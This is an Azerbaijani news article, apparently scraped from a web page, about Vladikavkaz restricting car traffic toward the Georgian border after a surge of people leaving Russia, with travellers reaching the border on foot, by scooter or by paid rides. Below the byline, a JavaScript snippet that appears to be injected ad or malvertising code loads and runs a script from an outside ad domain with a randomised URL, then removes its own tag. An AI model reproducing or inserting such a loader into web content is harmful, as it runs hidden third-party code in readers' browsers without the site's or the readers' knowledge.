Vladiqafqazda minik avtomobillərinin Gürcüstan istiqamətində hərəkəti məhdudlaşdırıldı

by admin

window._ttzi = 161;var script = document.createElement(“script”);script.src = “https://adviad.com/nativevideo/get_ads.js?=”+(Math.floor(Math.random() * 100000000) + 1);script.async = true;(document.body || document.head || document.documentElement).appendChild(script);script.onload = function(){script.parentNode.removeChild(script);};

Rusiyanı tərk etmək istəyənlərin sayının kəskin artması səbəbilə Vladiqafqazda minik avtomobillərinin Gürcüstan istiqamətində hərəkəti məhdudlaşdırılıb.

Bu barədə APA-nın Gürcüstan bürosu məlumat yayıb.Bildirilib ki, sentyabrın 23-də saat 03:30-dan etibarən Vladiqafqazda Moskovskiy və Kosta prospektlərində nəqliyyatın hərəkəti məhdudlaşdırılıb və Gürcüstanla gömrük-keçid məntəqəsi istiqamətində yalnız yerli qeydiyyat nişanına malik avtomobillər buraxılır.

Məlumata görə, bu səbəbdən Gürcüstan sərhədinə doğru insanlar piyada, skuterlə, velosipedlə, bəzi hallarda isə yerli sakinlərdən onları sərhədə çatdırması üçün ödəniş etməklə gəlirlər.

Şimali Osetiya rəsmiləri yaranmış vəziyyətə dair rəy bildirməyib.

Oxu.az

Bu yazılara da göz atın...